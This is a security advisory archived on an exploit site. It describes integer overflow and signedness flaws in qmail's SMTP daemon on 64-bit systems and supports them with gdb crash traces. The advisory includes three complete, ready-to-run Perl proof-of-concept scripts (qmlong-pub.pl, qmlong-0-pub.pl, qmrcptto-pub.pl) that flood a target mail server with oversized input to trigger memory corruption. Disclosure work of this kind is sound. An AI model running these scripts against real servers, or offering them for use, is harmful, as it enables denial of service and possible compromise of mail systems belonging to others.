exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

georgiQmail.txt

georgiQmail.txt
Posted Aug 7, 2005
Authored by Georgi Guninski

Various flaws exist with qmail on 64 bit platforms. Exploits provided.

tags | exploit
SHA-256 | e78a21634f16badb4dc5b430ee69e8aaf02b0f216e92396bb8d94d3c093ddf2d

georgiQmail.txt

Change Mirror Download
Georgi Guninski security advisory #74, 2005

64 bit qmail fun

Systems affected:
qmail on 64 bit platforms with a lot of virtual memory ( ~ >8GB)

Date: 6 May 2005

Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

there are several issues with qmail on 64 bit platforms - classical integer
overflow, pointer with signed index and signedness problem (not counting
the memory consumtion dos, which just helps).

Details:

note:
- you need more than 4GB memory per process for this.
- gdb line numbers may not match because of small changes in qmail src
- tested on athlon64 8400+ with linux

1. integer overflow in stralloc_readyplus
./qmlong-pub.pl

Program received signal SIGSEGV, Segmentation fault.
0x000000000040602a in byte_copy (
to=0x2ab165441000 <Address 0x2ab165441000 out of bounds>, n=3791142275,
from=0x2ab23ad04001 'v' <repeats 200 times>...) at byte_copy.c:9
9 if (!n) return; *to++ = *from++; --n;
(gdb) info stack
#0 0x000000000040602a in byte_copy (
to=0x2ab165441000 <Address 0x2ab165441000 out of bounds>, n=3791142275,
from=0x2ab23ad04001 'v' <repeats 200 times>...) at byte_copy.c:9
#1 0x00000000004054e3 in alloc_re (x=0x508ce0, m=4030573939, n=239428416)
at alloc_re.c:13
#2 0x0000000000405133 in stralloc_readyplus (x=0x508ce0, n=4030573940)
at stralloc_eady.c:6
#3 0x00000000004020d5 in commands (ss=0x508980, c=0x5089a0) at commands.c:20
#4 0x0000000000401e12 in main () at qmail-smtpd.c:419
(gdb)
(gdb) x/i $rip
0x40602a <byte_copy+38>: mov %dl,(%rax)
(gdb) p/x $rax
$1 = 0x2ab165441000
(gdb)


2. pointer + signed int in commands.c
int i;
...
i = str_chr(cmd.s,' ');
...
cmd.s[i] = 0;

./qmlong-0-pub.pl


Program received signal SIGSEGV, Segmentation fault.
0x00000000004021e2 in commands (ss=0x508980, c=0x5089a0) at commands.c:39
39 while (*arg == ' ') ++arg;
(gdb) p/x arg
$1 = 0x2aaee056d014
(gdb) p i
$2 = -2048917500
(gdb) info stack
#0 0x00000000004021e2 in commands (ss=0x508980, c=0x5089a0) at commands.c:39
#1 0x0000000000401e12 in main () at qmail-smtpd.c:419
(gdb)



3. sign problem in qmail_put/substdio_put
./qmrcptto-pub.pl

Program received signal SIGSEGV, Segmentation fault.
0x000000000040604a in byte_copy (to=0x52c000 <Address 0x52c000 out of bounds>,
n=2149893743, from=0x2aaf0b1bdb36 'v' <repeats 200 times>...)
at byte_copy.c:10
10 if (!n) return; *to++ = *from++; --n;
(gdb) info stack
#0 0x000000000040604a in byte_copy (
to=0x52c000 <Address 0x52c000 out of bounds>, n=2149893743,
from=0x2aaf0b1bdb36 'v' <repeats 200 times>...) at byte_copy.c:10
#1 0x0000000000405a72 in substdio_put (s=0x50a4b8,
buf=0x2aaf0b19c010 "T", 'v' <repeats 199 times>..., len=-2144935532)
at substdo.c:75
#2 0x0000000000403eda in qmail_put (qq=0x50a4a0,
s=0x2aaf0b19c010 "T", 'v' <repeats 199 times>..., len=-2144935532)
at qmail.c:55
#3 0x0000000000401cdd in smtp_data () at qmail-smtpd.c:386
#4 0x0000000000402297 in commands (ss=0x508980, c=0x5089a0) at commands.c:43
#5 0x0000000000401e12 in main () at qmail-smtpd.c:419

------
qmlong-pub.pl

#!/usr/bin/perl -w

# written by georgi guninski.
# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");


my $payload="v" x (1024*1024);
my $i=0;
while(42)
{
print $sock $payload;
$i++;
print "${i}\n";
}

------

------
qmlong-0-pub.pl
#!/usr/bin/perl -w

# written by georgi guninski.
# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");


my $payload="v" x (1024*1024);
my $i=0;
print $sock "HELO";
while(42)
{
print $sock $payload;
$i++;
print "${i}\n";
if ($i == 2142) {last;}
}
print $sock " \r\n";

while(<$sock>) {print $_;}

------

-----
qmrcptto-pub.pl
#!/usr/bin/perl -w

# written by georgi guninski.
# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");


my $payload="v" x (1024*1024);
my $i=0;
my $t;

print $sock "HELO a\r\n";
print $sock "MAIL FROM: a\r\n";

my $leg = 842;

$payload = "v" x $leg;
$cou=0;
my $vp= "v" x (1024*1024);

my $wri = 0;

while (42)
{
print $sock "RCPT TO: ${payload}\r\n";
$t=<$sock>;
$cou++;
$wri += ($leg + 1);
if ($wri > 0x80000010) {last;}
if ($cou % (1024) == 0) {print " .. " . $wri/(1024*1024) . "\n";}
}

print $sock "DATA\r\n";
print $sock "where do you want bill gates to go today?\r\n";
print $sock ".\r\n";

while(<$sock>)
{
print $_;
}
-----

--
where do you want bill gates to go today?

**
everything below is junk

















Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close